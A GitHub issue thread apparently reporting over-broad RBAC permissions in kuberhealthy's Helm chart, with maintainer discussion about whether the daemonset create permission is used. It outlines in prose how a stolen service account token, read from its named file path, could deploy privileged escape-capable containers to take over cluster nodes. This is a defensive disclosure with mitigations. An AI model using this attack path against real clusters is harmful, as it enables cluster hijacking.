Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[BUG] Deployment kuberhealthy has too much RBAC permission which may leads the whole cluster being hijacked #1255

Open
Yseona opened this issue Apr 30, 2024 · 3 comments
Labels
bug Something isn't working

Comments

@Yseona
Copy link

Yseona commented Apr 30, 2024

Hi community! Our team just found a possible security issue when reading the code. We would like to discuss whether it is a real vulnerability.

Description

The bug is that the Deployment kuberhealthy in the charts has too much RBAC permission than it needs, which may cause some security problems, and the worse one leads cluster being hijacked. The problem is that the kuberhealthy is bound to one clusterrole (clusterrole.yaml#L5) with the following sensitive permissions:

  • create/patch/update verb of the daemonsets resource (ClusterRole)

After reading the source code of kuberhealthy, I didn't find any Kubernetes API usages using these permissions. However, these unused permissions may have potential risk:

  • create/patch/update verb of the daemonsets resource (ClusterRole)
    • A malicious user can create a privileged container with a malicious container image capable of container escape. This would allow him/she gaining ROOT privilege of the worker node the created container deployed. Since the malicious user can control the pod scheduling parameters (e.g., replicas number, node affinity, …), he/she should be able to deploy the malicious container to every (or almost every) worker node. This means the malicious user will be able to control every (or almost every) worker node in the cluster.

The malicious users only need to get the service account token to perform the above attacks. There are several ways have already been reported in the real world to achieve this:

  • Supply chain attacks: Like the xz backdoor in the recent. The attacker only needs to read /var/run/secrets/kubernetes.io/serviceaccount/token.
  • RCE vulnerability in the APP: Any remote-code-execution vulnerability that can read local files can achieve this.

Mitigation Suggestion

  • Create a separate service account and remove all the unnecessary permissions
  • Write Kyverno or OPA/Gatekeeper policy to:
    • Limit the container image, entrypoint and commands of newly created pods. This would effectively avoid the creation of malicious containers.
    • Restrict the securityContext of newly created pods, especially enforcing the securityContext.privileged and securityContext.allowPrivilegeEscalation to false. This would prevent the attacker from escaping the malicious container. In old Kubernetes versions, PodSecurityPolicy can also be used to achive this (it is deprecated in v1.21).

Few Questions

  • Are these permissions really unused for kuberhealthy?
  • Would these mitigation suggestions be applicable for the kuberhealthy?
  • Our team have also found other unneccessary permissions (which is not that sensitive as above, but could also cause some security issues). Please tell us if you are interested in it. We’ll be happy to share it or PR a fix.

References

Several CVEs had already been assigned in other projects for similar issues:

@Yseona Yseona added the bug Something isn't working label Apr 30, 2024
@Yseona
Copy link
Author

Yseona commented May 6, 2024

Hi community:
I noticed that this issue hasn't been answered yet, please feel free to let me know if you need more information. Our team is happy to cooperate and do what we can to resolve this issue.

@peschmae
Copy link
Contributor

Kuberhealthy does have code that needs the daemonset create verb: https://github.com/kuberhealthy/kuberhealthy/blob/master/cmd/daemonset-check/kube_api.go#L47

How did you check the code? Was that done automatically?

@kaaass
Copy link

kaaass commented May 15, 2024

Kuberhealthy does have code that needs the daemonset create verb: https://github.com/kuberhealthy/kuberhealthy/blob/master/cmd/daemonset-check/kube_api.go#L47

@peschmae Thank you for reminding us of this! We have found that the daemonset create verb is used here during our check. However, after a detailed inspection, we found that this function is only called by cmd/daemonset-check/main.go, but not by cmd/deployment-check/main.go and cmd/kuberhealthy/main.go. Therefore, we only reported the issue with Deployment kuberhealthy.

How did you check the code? Was that done automatically?

We wrote a tool to match the APIs for all resource operations on controller-runtime and client-go SDK, and then checked if it was being used by a workload. We had manually checked each permission we reported.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working
Projects
None yet
Development

No branches or pull requests

3 participants